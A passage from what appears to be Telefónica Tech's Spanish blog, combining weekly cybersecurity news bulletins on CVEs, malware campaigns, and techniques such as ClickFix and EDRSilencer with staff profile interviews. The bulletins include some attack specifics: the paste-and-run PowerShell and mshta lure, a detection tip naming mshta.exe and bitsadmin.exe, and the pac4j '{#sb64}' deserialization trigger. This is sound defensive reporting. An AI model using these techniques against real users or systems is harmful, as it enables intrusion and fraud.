Hive0145. Según los expertos, dicha campaña estaría apuntando principalmente contra Alemania, España y Ucrania y se estaría realizando mediante la remisión de correos maliciosos. En concreto, Hive0145 estaría distribuyendo Strela Stealer mediante el uso de cuentas vulneradas correos simulando ser facturas y recibos con adjuntos que al ejecutarse por parte de la víctima infectan el equipo con dicho malware. Asimismo, los investigadores señalan que Hive0145 ha ido evolucionando sus TTP desde al menos 2022, la última versión del malware, además de robar información, recopila información del sistema, recupera lista de aplicaciones instaladas y comprueba el idioma del teclado de la víctima para atacar únicamente a quienes utilicen español, alemán, catalán, polaco, italiano, vasco o ucraniano. Más info Bitdefender publica una herramienta para el descifrado de ShrinkLocker Bitdefender ha publicado un informe en el que detalla el funcionamiento del ransomware ShrinkLocker y, además, una herramienta gratuita para descifrar los archivos encriptados con este malware. ShrinkLocker, que comenzó a actuar a principios de este año, abusa de la herramienta legítima de Windows Bitlocker para cifrar archivos y luego elimina las opciones de recuperación. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
15 de noviembre de 2024
“Tenemos un compromiso a largo plazo con la digitalización segura de las empresas colombianas” –Jennifer Suárez
Jennifer Suárez es Country Manager de Telefónica Tech en Colombia, responsable de liderar y dirigir las operaciones de la compañía en el país y de establecer y ejecutar la estrategia de negocio para el mercado colombiano. ______ Cuéntanos un poco sobre ti: ¿Quién eres y a qué te dedicas? Soy Jennifer Suárez, Country Manager de Telefónica Tech en Colombia. Desde julio de este año he asumido el reto de liderar la estrategia integral de Telefónica Tech en mi país, desarrollar el negocio y gestionar un equipo humano con gran potencial. Es un privilegio para mí asumir este reto y acompañar a las empresas colombianas en su proceso de transformación digital. A lo largo de mis 18 años en Grupo Telefónica he trabajado en diversas áreas, adquiriendo una visión 360 de la compañía. Esta experiencia me permite ofrecer a nuestros clientes todas las capacidades, adaptándonos a la tecnología y logrando resultados de negocio en diferentes sectores empresariales. ¿Cuál es tu especialización? ¿Cómo llegaste a dedicarte a lo que haces? Inicié mi trayectoria profesional en la Universidad Piloto de Colombia, donde me gradué como ingeniera de telecomunicaciones. Poco después tuve el privilegio de unirme al equipo de Telefónica en Colombia como analista de procesos. La cultura de Telefónica nos anima siempre a desafiarnos en lo personal y profesional, por lo que en mi día a día siempre busco ampliar mis conocimientos y adaptarlos a las necesidades de nuestros clientes. Por esto me especialicé en Gerencia de Empresas de Telecomunicaciones en la Universidad de los Andes mientras asumía un nuevo rol en el área de procesos, calidad y gestión del cambio, donde trabajé durante tres años. A lo largo de mi carrera he tenido la oportunidad de crecer en diferentes roles y áreas dentro de la compañía, desarrollando una profunda pasión por el tejido empresarial de Colombia. Ahora, como Country Manager de Telefónica Tech en Colombia, puedo seguir aprendiendo y además aportar mi experiencia a un equipo excepcional, con foco en apoyar la transformación digital de nuestros clientes y en proteger sus activos digitales. ¿Tenías claro desde pequeña que querías dedicarte al mundo de la tecnología? Dedicarme al mundo de la tecnología y las telecomunicaciones siempre ha sido un aspiracional por la ausencia de mujeres en este campo. Desde pequeña he deseado destacar en el ámbito tecnológico y generar un impacto positivo en el entorno empresarial. Mi curiosidad innata siempre me ha motivado a buscar oportunidades para aprender y acercarme al mundo de la tecnología. ¿A qué desafíos te has enfrentado al asumir este puesto? ¿Cómo te ha ayudado tu formación y tu experiencia? Las posiciones corporativas siempre presentan desafíos. El primero es liderar al equipo para identificar el mejor talento, enriquecerlo con diferentes perfiles y motivarlo para cumplir con las expectativas de nuestros clientes. En mi experiencia para enriquecer un equipo necesitas diversidad: fomenta la empatía, la colaboración y la resolución creativa de problemas. Esto impulsa la innovación y efectividad en nuestras soluciones tecnológicas. Precisamente en Telefónica Tech promovemos la iniciativa #WomenWithTech para visibilizar el talento femenino que tenemos en la compañía y apoyar a las mujeres con espíritu tecnológico y ganas de desarrollar su carrera en profesiones STEAM. Otro desafío cotidiano es provechar situaciones complejas en oportunidades aplicando nuestro conocimiento, los procesos adecuados y la mejor tecnología. Además, dada la escasez de visibilidad de talento digital, tenemos la necesidad de fortalecer la formación y la capacitación en este ámbito. Abordamos la Ciberseguridad y la protección de los datos empresariales con eficacia para afianzar la confianza de nuestros clientes. ¿Cuáles han sido tus principales objetivos desde que asumiste tu puesto como Country Manager? Desde que asumí el puesto de Country Manager he establecido como objetivos principales acompañar la gestión y protección de los activos digitales de las empresas en Colombia. Estamos enfocados en proporcionar a empresas, organizaciones y administraciones públicas acceso a tecnologías digitales de última generación, junto con las capacidades profesionales necesarias para lograr una transformación digital segura y efectiva. Estoy orgullosa por el reconocimiento de Telefónica en el informe "Telco-to-Techco Strategies Benchmark" de Omdia como la empresa de Europa y América que lidera el camino en su transformación de compañía de telecomunicaciones a compañía tecnológica. Este reconocimiento valida nuestro compromiso con la transformación digital, ofreciendo a nuestros clientes soluciones avanzadas de Ciberseguridad, Cloud, Aplicaciones de negocio, analítica avanzada de datos, IoT, Inteligencia Artificial, entre otras. Este reconocimiento refleja nuestro enfoque en la innovación y nuestra determinación por alcanzar metas ambiciosas que ayuden a nuestros clientes a transformar sus negocios. ¿Cómo evalúas el estado actual de la digitalización en Colombia y cuáles son los principales desafíos que enfrentan empresas y administraciones en este proceso? Colombia ha logrado avances significativos en digitalización; sin embargo, tanto las administraciones públicas como las empresas enfrentan importantes desafíos. La brecha digital sigue siendo un problema crítico, especialmente entre las zonas urbanas y rurales, lo que limita el acceso equitativo a las tecnologías. Además, la infraestructura digital requiere mejoras en calidad y velocidad para soportar aplicaciones avanzadas. Según NCSI (National Cyber Security Index), Colombia tiene un nivel bajo en análisis e información sobre amenazas cibernéticas, gestión de crisis cibernéticas y contribución a la Ciberseguridad global. Aunque el país ha avanzado en su proceso de digitalización, es fundamental superar estos desafíos para lograr una transformación digital segura, inclusiva y sostenible. La brecha digital entre las zonas urbanas y rurales limita el acceso equitativo a las tecnologías. ¿Qué medidas específicas ha implementado Telefónica Tech para garantizar la seguridad de los datos de sus clientes en Colombia? En Telefónica Tech ponemos a disposición de las empresas y organizaciones colombianas las tecnologías más innovadoras respaldadas por un equipo global de profesionales altamente capacitados. Nuestro portafolio de soluciones avanzadas de Ciberseguridad NextDefense ofrece protección contra amenazas, inteligencia de amenazas y respuesta a incidentes. Estas soluciones avanzadas detectan, previenen y mitigan ciberataques, protegiendo endpoints, redes y aplicaciones con tecnología de última generación. Además, proporcionamos análisis global de datos de amenazas, soporte 24/7, y asesoramiento y capacitación en Ciberseguridad. Digital Operations Center de Telefónica Tech tiene sede en Madrid y Bogotá. Nuestro Digital Operations Center (DOC) nos permite monitorizar y gestionar en tiempo real la infraestructura digital de nuestros clientes, las 24 horas del día y los 7 días de la semana. Además, contamos con una red global de Security Operations Centers (SOC) que garantizan vigilancia continua y respuesta inmediata ante cualquier incidente de seguridad que nos permite ofrecer un enfoque proactivo y eficaz en la protección de los sistemas y activos digitales de nuestros clientes. ¿Cómo se está preparando Telefónica Tech para enfrentar las ciberamenazas emergentes y en evolución? A través de la capacitación continua, actualización y certificación de nuestros los 2.500 profesionales con los que contamos en Telefónica Tech solo en el ámbito de la Ciberseguridad. Además, contamos con un sólido ecosistema de partners que nos brinda acceso a una amplia gama de soluciones y tecnologías líderes en el mercado, fortaleciendo nuestra capacidad para abordar cualquier desafío de seguridad con confianza y agilidad. Nuestros profesionales están siempre al día con las últimas tecnologías y estrategias de Ciberseguridad, lo que nos permite ofrecer soluciones innovadoras y efectivas para proteger los datos de nuestros clientes. En el ámbito de la ciberinteligencia, destacamos por adoptar tecnologías avanzadas y colaborar con organismos nacionales e internacionales, así como con líderes del sector. ¿Qué tipo de colaboración tiene Telefónica Tech con otras empresas y entidades gubernamentales en el ámbito de la Ciberseguridad? Desde Telefónica Tech colaboramos con empresas privadas y entidades gubernamentales para fortalecer la Ciberseguridad. Implementamos soluciones avanzadas que protegen infraestructuras críticas y datos sensibles, fomentando el intercambio de información sobre amenazas emergentes y vulnerabilidades para estar mejor preparados ante ciberataques. En Telefónica Tech ofrecemos servicios de consultoría y formación en Ciberseguridad que ayudan a nuestros clientes a mejorar sus competencias y conocimientos. También realizamos ejercicios conjuntos de Ciberseguridad con diferentes entidades donde simulamos ataques cibernéticos para evaluar la capacidad de respuesta y mejorar las estrategias de defensa. Estos ejercicios ayudan a identificar puntos débiles y a desarrollar protocolos más robustos para gestionar incidentes de seguridad. ¿Qué previsiones tienes para seguir creciendo en Colombia? Estamos desarrollando planes ambiciosos para expandir nuestra presencia en Colombia. Estas estrategias incluyen significativas inversiones en profesionales y en infraestructura de Ciberseguridad y cloud de última generación. También estamos diseñando programas de formación técnica para el talento local para desarrollar y fomentar el talento local. Esta expansión no solo refuerza nuestro compromiso con el crecimiento económico y seguro de Colombia, sino que también nos posiciona como un actor clave a largo plazo en la región. Estamos diseñando programas de formación técnica para desarrollar y fomentar el talento local. ¿Cómo concilias tu puesto de alta responsabilidad con tu vida personal? Tener una alta responsabilidad profesional no es impedimento para tener una vida personal. Desempeño mis tareas profesionalmente, aprovechando las relaciones interpersonales con mi equipo, clientes y aliados. También creo espacios familiares y deportivos que complementan mi trabajo. La organización y la priorización son esenciales; uso herramientas de gestión de tiempo para mantenerme enfocada y productiva, permitiéndome desconectar. Practicar actividades que me apasionan recarga mi energía y mantiene mi mente despejada, lista para asumir mis responsabilidades en todos los ámbitos de mi vida.
14 de noviembre de 2024
Boletín de Ciberseguridad, 1 - 8 noviembre
Cisco corrige fallo en puntos de acceso URWB que permite ejecución de comandos root Cisco ha corregido una vulnerabilidad crítica en puntos de acceso Ultra-Reliable Wireless Backhaul (URWB) que permite la ejecución de comandos con privilegios de root. Este fallo, identificado como CVE-2024-20418 y con un CVSSv3 de 10.0 según el fabricante, permite que actores no autenticados realicen ataques de inyección de comandos de baja complejidad sin requerir interacción del usuario. Según Cisco, la causa es una validación inadecuada en la interfaz de gestión web del software inalámbrico industrial unificado, y un exploit exitoso permitiría ejecutar comandos arbitrarios en el sistema operativo del dispositivo afectado. La vulnerabilidad afecta a puntos de acceso Catalyst IW9165D, IW9165E, e IW9167E cuando operan en modo URWB. Cisco afirma que no se ha detectado ningún código de explotación disponible ni evidencias de ataques en curso. Los administradores pueden verificar si el modo URWB está activo usando el comando "show mpls-config". Si el comando no está disponible, el modo de funcionamiento URWB está desactivado y el dispositivo no se ve afectado por esta vulnerabilidad. Más info Corregidas dos vulnerabilidades graves en Chrome Google ha hecho pública una nueva actualización de su navegador Chrome, que soluciona dos vulnerabilidades de alta gravedad descubiertas por investigadores anónimos. Los fallos, identificados como CVE-2024-10826 y CVE-2024-10827, ambos con una puntuación CVSSv3 de 8.8 según CISA, se corresponden con un error use-after-free identificado en los componentes de Google Chrome Family Experiences y Serial, respectivamente. Un atacante podría explotar los fallos para aprovecharse de problemas de gestión de memoria. Ambas vulnerabilidades han sido solucionadas mediante la actualización del Stable Channel a la versión 130.0.6723.116/.117 para Windows y Mac y a la versión 130.0.6723.116 para Linux. El fabricante ha anunciado que la actualización se distribuirá a los usuarios en los próximos días o semanas, mientras que la lista completa de cambios se encuentra disponible en el registro de Chrome. Más info ToxicPanda: nuevo malware dirigido contra Android El equipo de investigadores de Cleafy ha publicado un análisis en el que informan sobre el descubrimiento de un nuevo software malicioso dirigido contra dispositivos Android que permite a actores de amenazas realizar transacciones bancarias fraudulentas. En concreto, este malware ha sido denominado ToxicPanda, y se cree que ha sido creado por actores de habla china; además, comparte similitudes con otro malware para Android llamado TgToxic al disponer de 61 comandos comunes entre ambos. Según los expertos, el objetivo principal de ToxicPanda es iniciar transferencias de dinero desde dispositivos comprometidos a través de la toma de cuenta (ATO) utilizando una técnica denominada ODF. Además, su método de distribución consiste en suplantar aplicaciones conocidas como Google Chrome, Visa y 99 Speedmart a través de webs fraudulentas. En cuanto a sus víctimas, la mayoría de los ataques se han reportado en Italia, seguido de Portugal, aunque también se han identificado casos en Hong Kong, España y Perú de usuarios de banca minorista. Más info Nuevo análisis del ransomware Interlock El equipo de Cisco Talos Intelligence ha publicado nuevos detalles acerca del ransomware Interlock, activo desde al menos septiembre de 2024. En concreto, Interlock podría haber sido creado por los operadores del ransomware Rhysida debido a las similitudes entre las técnicas y los binarios de cifrado de ambos grupos. Durante el incidente en el que Interlock fue detectado y analizado por el equipo de Cisco Talos, el atacante obtuvo acceso inicial mediante una falsa actualización de Google Chrome que era descargada de una URL legítima comprometida. Dicho archivo era un ejecutable que contenía un Troyano de Acceso Remoto (RAT) y que, a su vez, descargaba un stealer de credenciales y un keylogger. Finalmente, el atacante desplegaba el binario del ransomware, que se hacía pasar por un archivo legítimo, y cifraba los archivos de los dispositivos infectados para posteriormente solicitar un rescate a las víctimas. Más info Detectada una nueva táctica denominada ClickFix Investigadores de Sekoia han analizado una nueva táctica denominada ClickFix, mediante la que actores maliciosos utilizan páginas falsas de Zoom y Google Meet para distribuir malware utilizando herramientas legítimas. En concreto, se muestra a los usuarios un falso mensaje de error por un problema con el micrófono o los auriculares, indicando que pulsen “Windows + R” para abrir el cuadro de diálogo Ejecutar. Tras esto, se indica que peguen y ejecuten comandos maliciosos, relacionados normalmente con scripts PowerShell para descargar y ejecutar cargas útiles. La técnica aprovecha la apariencia de legitimidad para reducir las posibilidades de ser detectado. Para infectar dispositivos macOS se descarga un archivo .dmg que ejecuta el malware directamente. Para Windows, se utilizan dos cadenas de infección principales: una utiliza un comando Mshta malicioso, mientras que la otra emplea PowerShell. A fin de detectar y prevenir esta actividad maliciosa, se recomienda monitorizar procesos como mshta.exe o bitsadmin.exe iniciados por Explorer.exe, así como las solicitudes de red sospechosas realizadas por dichos procesos, además del empleo de sistemas EDR para identificar estos patrones. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
8 de noviembre de 2024
Boletín de Ciberseguridad, 26 - 31 octubre
CrossBarking: vulnerabilidad en Opera que expone API privadas a atacantes Investigadores de Guardio Labs descubrieron un fallo de seguridad que permite obtener acceso completo a las API privadas del navegador Opera, exponiendo riesgos graves. Opera otorga acceso a ciertas API privadas a dominios preferidos, lo cual permite a sus desarrolladores mejorar funcionalidades como la seguridad y el rendimiento. Sin embargo, los investigadores demostraron cómo los atacantes pueden aprovechar estas API para realizar cambios no autorizados, secuestrar cuentas y desactivar extensiones de seguridad. Nombrado CrossBarking, este fallo puede explotarse insertando código malicioso en sitios web con acceso a estas API privadas, empleando vulnerabilidades de cross-site scripting (XSS) o extensiones maliciosas de Chrome, que también funcionan en Opera. En una prueba, modificaron la configuración de DNS del navegador de una víctima, lo que les permitió espiar y manipular su actividad en línea. Opera abordó el riesgo bloqueando la ejecución de scripts en sitios con acceso a API privadas, sin eliminar dichas API ni su compatibilidad con extensiones de Chrome. Más info Nueva actualización de Google Chrome Google ha publicado un aviso de seguridad en donde informa sobre una nueva versión del navegador web Chrome que corrige dos vulnerabilidades de alta criticidad. En concreto, los fallos de seguridad son los registrados como CVE-2024-10487, considerado como crítico y que se produce por una escritura fuera de límites en Dawn, y el fallo CVE-2024-10488, calificado con riesgo alto, que se produce por un uso después de la liberación en WebRTC. Cabe destacar como es costumbre en Google Chrome no dar más detalles con el objetivo de que la mayoría de los usuarios actualicen el activo afectado. Desde Google, en base a estos hechos, recomiendan a los usuarios actualizar Chrome a la versión 130.0.6723.91/.92 para Windows y Mac y a 130.0.6723.91 para Linux. Más info Fallo de seguridad de downgrade en Windows permite acceso a Windows Update El investigador de seguridad de SafeBreach, Alon Leviev, ha publicado un análisis en relación con los fallos de seguridad que podrían permitir hacer un downgrade en Windows haciendo un bypass en el kernel del sistema. En concreto, este investigador desarrolló Windows Downdate, herramienta que permite crear versiones inferiores y exponer un sistema completamente actualizado a fallos ya corregidos a través de componentes obsoletos. A raíz de estos hechos, identificó las vulnerabilidades CVE-2024-21302, CVSSv3 de 6.7 y CVE-2024-38202, CVSSv3 de 7.3 en BlackHat y DEFCON. Sin embargo, pese haberse corregido esos fallos, Leviev señala que Microsoft aún tiene que abordar el problema de la toma de control de Windows Update, el cual obtener la ejecución del código del núcleo como administrador no se considera una vulnerabilidad al uso, aunque permite implementar rootkits personalizados que pueden neutralizar los controles de seguridad, ocultar procesos y actividad de la red, o mantener el sigilo, entre otros. Según Microsoft, la compañía estaría desarrollando activamente mitigaciones para protegerse contra este tipo de ataques. Más info Autoridades policiales desmantelan infraestructura de Redline y Meta en la operación Magnus La Policía Nacional Holandesa en colaboración con otras autoridades como el FBI, NCIS, el Departamento de Justicia de Estados Unidos, Eurojust, la NCA y fuerzas policiales de Portugal y Bélgica, han desmantelado la infraestructura de los infostealers Redline y Meta. Según fuentes policiales, las autoridades afirman haber obtenido acceso al código fuente, incluidos servidores de licencias, servicios REST-API, paneles, binarios de robo y bots de Telegram de ambos malware. Cabe indicar que tanto Meta como Redline comparten la misma infraestructura, por lo que se estima que los creadores y operadores que están detrás de ambos proyectos sean los mismos. En último lugar, cabe reseñar que este anuncio sobre la interrupción de la infraestructura fue informado en un sitio web denominado Operación Magnus, el cual tiene un temporizador con una cuenta atrás que promete más noticias, imitando a las acciones de grupos criminales. Más info Black Basta ataca a través de Microsoft Teams ReliaQuest ha advertido de que el ransomware Black Basta ha trasladado sus ataques de ingeniería social a Microsoft Teams. Los actores maliciosos primero inundan la bandeja de entrada de un empleado con emails, tras lo cual contactan con los empleados a través de Microsoft Teams como usuarios externos, haciéndose pasar por el servicio de asistencia de IT corporativo para ayudarle con el problema de spam en curso. Las cuentas se crean bajo inquilinos Entra ID que imitan al servicio de asistencia. Asimismo, se ha observado el envío de códigos QR en los chats, sin que quede clara su finalidad. El fin último del ataque es que el objetivo instale AnyDesk o inicie Quick Assist para que los actores de amenazas obtengan acceso remoto a sus dispositivos para, posteriormente, instalar cargas útiles y en última instancia Cobalt Strike, proporcionando acceso completo al dispositivo comprometido. ReliaQuest sugiere a las organizaciones que restrinjan la comunicación de usuarios externos en Microsoft Teams, permitiéndola sólo desde dominios de confianza, además de activar el registro, especialmente para el evento ChatCreated, a fin de encontrar chats sospechosos. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
31 de octubre de 2024
Boletín de Ciberseguridad, 19 - 25 octubre
GitLab soluciona vulnerabilidades que desencadenan ataques XSS y DoS GitLab ha lanzado actualizaciones de seguridad críticas para sus versiones Community Edition (CE) y Enterprise Edition (EE) que abordan una vulnerabilidad de inyección de HTML de alta gravedad. Esta vulnerabilidad, identificada como CVE-2024-8312, con una puntuación CVSSv3 de 8.7 según el fabricante, afecta a las versiones de GitLab CE/EE desde la 15.10 y permite a los atacantes ejecutar ataques XSS al inyectar HTML en el campo de búsqueda global dentro de una vista diff, lo que representa un riesgo elevado para la confidencialidad e integridad de los sistemas afectados. GitLab insta a los usuarios con instalaciones autogestionadas a actualizar a las versiones parcheadas 17.5.1, 17.4.3 y 17.3.6. Además, las actualizaciones también solucionan una vulnerabilidad de denegación de servicio (DoS) de gravedad media, rastreada como CVE-2024-6826, con un CVSSv3 de 6.5 según GitLab, explotable a través de la importación de archivos XML manipulados y que afecta a las versiones desde la 11.2. Asimismo, se han realizado mejoras en herramientas adicionales como los gráficos de timón y la pila de análisis. Más info NotLockBit: ransomware que apunta contra sistemas macOS El equipo de investigadores de SentinelOne ha publicado una investigación en la que indican haber identificado un nuevo ransomware al cual se ha denominado NotLockBit y apunta contra dispositivos que utilizan macOS. En concreto, dicho nombre viene a raíz de que esta nueva familia de malware suplanta a LockBit mostrando en el fondo de escritorio un banner de LockBit 2.0. En cuanto a características de NotLockBit, este se distribuye como un binario x86_64, lo que sugiere que solo funciona en dispositivos macOS con Intel y Apple Silicon que ejecutan el software de emulación Rosetta. Asimismo, utiliza un cifrado asimétrico RSA, por lo que el actor malicioso detrás de NoLockBit garantiza que la clave maestra no se pueda descifrar sin la clave privada en poder del atacante. En cuanto a la exfiltración, esta se realiza a un bucket de AWS controlado por el atacante, utilizando credenciales de AWS codificadas. Desde SentinelOne señalan que pese a que actualmente dichas cuentas de AWS han sido eliminadas, consideran que debido a la complejidad de la amenaza, esta seguiría en desarrollo. Más info Vulnerabilidad 0-day activamente explotada en Samsung Google ha advertido de la existencia de una vulnerabilidad 0-day en los procesadores móviles de Samsung, la cual habría sido aprovechada como parte de una cadena EoP de exploits para la ejecución arbitraria de código. El fallo, identificado como CVE-2024-44068 con puntuación CVSSv3 de 8.1 y parcheado como parte del conjunto de correcciones de seguridad de Samsung del mes de octubre, se corresponde con un error use-after-free que un atacante podría aprovechar para escalar privilegios en dispositivos vulnerables. La vulnerabilidad afecta a los procesadores Exynos 9820, 9825, 980, 990, 850 y W920 de Samsung y se debe a un problema en un controlador, el cual proporciona aceleración de hardware para funciones multimedia. Por su parte, el exploit activa el error indicado y, posteriormente, utiliza un comando de firmware para copiar datos en las páginas virtuales de E/S, dando lugar a un ataque de duplicación del espacio del kernel (KSMA) y rompiendo las protecciones de aislamiento del kernel de Android. Más info Detectado un aumento en las campañas de spam de tipo callback phishing Entre julio y septiembre, los investigadores de Trustwave detectaron un aumento en las campañas de spam del 140%. En estas campañas, los actores maliciosos estarían empleando una técnica de spam en dos fases, comenzando por correos electrónicos de phishing y, posteriormente, pasando a llamadas telefónicas. En concreto los atacantes empleaban una técnica denominada callback phishing o Telephone-Oriented Attack Delivery (TOAD), de tal manera que los emails enviados a las víctimas, los cuales contenían señuelos como una factura o un aviso de cancelación de cuenta, tenían como objetivo que estas llamasen al número de teléfono del atacante indicado en el mensaje. Finalmente, durante la llamada los atacantes solicitaban a la víctima su información de identificación personal o les hacían acceder a páginas web que descargaban malware y que permitían al atacante robar más información e incluso obtener acceso remoto a los dispositivos de las víctimas. Más info Nuevo análisis del troyano bancario Grandoreiro El equipo de investigación de Kaspersky ha publicado un análisis sobre Grandoreiro, el conocido troyano bancario que ha estado operando desde al menos 2016 y forma parte de Tetrade, una clasificación que agrupa a cuatro grandes familias de troyanos bancarios (Astaroth, Javali, Melcoz y Grandoreiro), creadas, desarrolladas y propagadas por actores maliciosos brasileños. Grandoreiro facilita fraudes bancarios mediante el equipo de la víctima, eludiendo las medidas de seguridad. A pesar de las detenciones en España, Brasil y Argentina en 2021 y 2024, la banda sigue activa, expandiendo su infraestructura y mejorando sus técnicas para evitar ser detectada. En 2024, Grandoreiro atacó a 1700 bancos y 276 carteras de criptomonedas en 45 países. Este malware ha implementado nuevas tácticas, como el uso de 3 DGAs, cifrado de texto y seguimiento del ratón, para evadir soluciones antifraude. Las campañas recientes se basan en phishing, malvertising y archivos ZIP maliciosos. Además, el grupo ha fragmentado su base de código, generando versiones locales dirigidas a México y otros países. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
25 de octubre de 2024
Boletín de Ciberseguridad, 12 - 18 octubre
Splunk corrige varias vulnerabilidades, dos críticas que permiten RCE Splunk ha lanzado parches para corregir varias vulnerabilidades en paquetes de terceros en Splunk Enterprise versiones 9.3.1, 9.2.3, 9.1.6 y superiores, destacando dos fallos críticos de ejecución remota de código. La vulnerabilidad más grave, identificada como CVE-2024-45733 y con un CVSSv3 de 8.8 según fabricante, afecta a instancias en Windows y permite a un usuario sin roles de alto nivel ejecutar código de forma remota debido a una configuración insegura en el almacenamiento de sesiones. Otro fallo, CVE-2024-45731 CVSSv3 8.0 según fabricante, permite la escritura arbitraria de archivos en el directorio raíz de Windows, lo que podría llevar a la ejecución de código a través de una DLL maliciosa. Ambos problemas se solucionan en las versiones 9.2.3 y 9.3.1 de Splunk Enterprise. Además, se corrigió el CVE-2024-45732, CVSSv3 7.1 según proveedor, un fallo de divulgación de información en Splunk Enterprise y Splunk Cloud Platform. También se abordaron otras vulnerabilidades de gravedad media relacionadas con la ejecución de código JavaScript, exposición de contraseñas y datos sensibles, y caídas del sistema. ✅ Splunk recomienda aplicar las actualizaciones correspondientes para así mitigar los riesgos. Más info Solucionada una vulnerabilidad crítica RCE del módulo pac4j-core Una vulnerabilidad crítica ha sido detectada en el framework de Java pac4j, la cual afecta a versiones anteriores a la 4.0 del módulo pac4j-core. El fallo, identificado como CVE-2023-25581, y con puntuación CVSSv3 de 9.2 según el proveedor, expone a los sistemas a posibles ataques de ejecución remota de código debido a un fallo en el proceso de deserialización. En concreto, la vulnerabilidad se debe a una verificación inadecuada del método de restauración si una cadena de un atributo contiene el prefijo {#sb64}. Esto permite a un atacante crear un atributo malicioso que desencadene la deserialización de una clase Java arbitraria, conduciendo potencialmente a la ejecución de código arbitrario en los sistemas vulnerables si la explotación del fallo es exitosa. ✅ Para mitigar el riesgo, se recomienda a los usuarios que actualicen a la versión 4.0 o posteriores de pac4j-core, en las cuales se ha solucionado la vulnerabilidad indicada. Más info EDRSilencer es utilizada por actores de amenaza para eludir la detección Investigadores de Trend Micro han observado que actores maliciosos estarían usando la herramienta EDRSilencer, integrándola en sus acciones con el fin de evadir la detección. EDRSilencer es una herramienta de pen-testing de código abierto que detecta los procesos EDR en ejecución y se utiliza Windows Filtering Platform (WFP) para supervisar, modificar o bloquear el tráfico de red. Utilizando reglas personalizadas, un atacante podría interrumpir el intercambio de datos entre una herramienta EDR y su servidor de gestión, impidiendo la entrega de alertas, registros e informes. En su última versión, EDRSilencer detecta y bloquea 16 herramientas EDR, incluyendo Microsoft Defender, SentinelOne o FortiEDR, entre otras. Esta permite a los atacantes añadir filtros para procesos específicos proporcionando rutas de archivos. De este modo, el malware u otras actividades maliciosas pueden eludir la detección, incrementando las posibilidades de éxito de los ataques. ✅ Desde TrendMicro se recomienda detectar la herramienta como malware, además de implementar controles de seguridad multicapa y buscar IOC. Más info Aumentan los ataques de ransomware pero disminuyen los incidentes que llegan a la fase de cifrado Microsoft ha afirmado en su nuevo Digital Defense Report de 2024 que los actores de amenazas activos habrían aumentado la sofisticación de sus tácticas, técnicas y herramientas. En el periodo de análisis recogido en el informe, que iría de junio de 2022 a julio de 2023, no solo se habría observado un aumento en la complejidad de los ataques, sino que la frecuencia de algunas tipologías de incidentes habrían aumentado más de un 200%. En concreto, los incidentes de ransomware destacan por presentar una incidencia un 275% mayor que en el periodo de análisis anterior, aunque Microsoft destaca que el número de estos ataques que llegó a la fase de cifrado ha descendido un 300% en los dos últimos años. El proveedor, quien ha atribuido este descenso a las nuevas herramientas de detección e interrupción automática de ciberataques, también habría destacado que las dos motivaciones principales detrás de los ataques de ransomware serían la obtención de ganancias económicas y el espionaje de naciones-estado. Más info IntelBroker pone a la venta datos supuestamente robados de Cisco Cisco ha indicado que se encuentra investigando las declaraciones de que la compañía habría sufrido una brecha realizada por actores maliciosos. Específicamente, en una publicación realizada en la plataforma de ciberdelincuencia Breach Forums por el actor de amenazas conocido como IntelBroker, este afirmó que él y otros dos usuarios llamados EnergyWeaponUser y zjj accedieron a la compañía el 10 de junio de 2024 y robaron una gran cantidad de datos de desarrolladores de la empresa. Entre la información filtrada se encontrarían códigos fuente, documentos confidenciales, tokens de API, certificados y credenciales de empresas mundiales como AT&T, Microsoft o Verizon. Además, IntelBroker compartió muestras de los supuestos datos robados, en las que se observaba una base de datos, información y documentación variada de clientes, y capturas de pantalla de portales de gestión de clientes. Sin embargo, el actor de amenazas no dio más detalles sobre cómo se produjo la brecha de seguridad. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
18 de octubre de 2024
#WomenWithTech: Katterine y el poder de la tecnología para generar cambio
¿Quién eres y a qué te dedicas? Mi nombre es Katterine Nodarse y soy Product Manager en Telefónica Tech. Actualmente, me dedico a liderar la estrategia global de protección de correo electrónico. Mi rol implica diseñar, desarrollar y gestionar servicios innovadores que garanticen la seguridad del correo electrónico, una pieza clave en la protección de las comunicaciones digitales. Además, estoy llevando esta estrategia de protección de correo a las diferentes geografías para fortalecer nuestra huella global. ¿Cuál es tu especialización? ¿Cómo llegaste a dedicarte a lo que haces ahora? Mi especialidad se centra en el campo de la Ciberseguridad, vinculado al ámbito de Producto. A lo largo de mi trayectoria, he tenido la oportunidad de gestionar servicios en diversas áreas, comenzando con Cloud Security y, más adelante, enfocados en Network Security. Katterine es responsable de la estrategia de protección de correo electrónica en Telefónica Tech. Llegué a dedicarme a este campo de manera gradual, comenzando con un interés general por la tecnología y las ciencias. Con el tiempo fui profundizando en la Ciberseguridad, un área que se ha vuelto esencial para la protección de los entornos digitales. Las diversas experiencias que he acumulado al gestionar estos servicios han fortalecido mi perspectiva y expertise en este campo. ¿Tenías claro que querías dedicarte al mundo de la tecnología? No tenía muy claro que quisiera enfocarme en la tecnología, pero desde pequeña siempre me gustaron mucho las matemáticas, así que sabía que escogería una carrera en el área de ciencias. Con el tiempo, mientras exploraba distintos campos dentro de este ámbito, fue cuando descubrí mi interés por la tecnología. ¿Qué o quién te motivó a escoger una profesión relacionada con la tecnología? Lo que me impulsó a elegir una carrera vinculada con la tecnología fue mi interés por estar en áreas innovadoras y de vanguardia. La tecnología me brindaba muchas oportunidades para lograrlo. Este sector está en constante evolución, lo que me da la oportunidad de trabajar en proyectos apasionantes y disruptivos que generan un impacto real. Lo que más me atrajo de la tecnología fue la posibilidad de seguir aprendiendo, enfrentar nuevos retos y ser parte de avances que pueden transformar nuestra forma de vivir y trabajar. Una de las grandes aficiones de Katterine es viajar y conocer diferentes culturas. En Londres, el verano pasado. ¿Cómo describirías tu trayectoria profesional hasta ahora y cuáles son las habilidades que utilizas en Telefónica Tech? A lo largo de mi 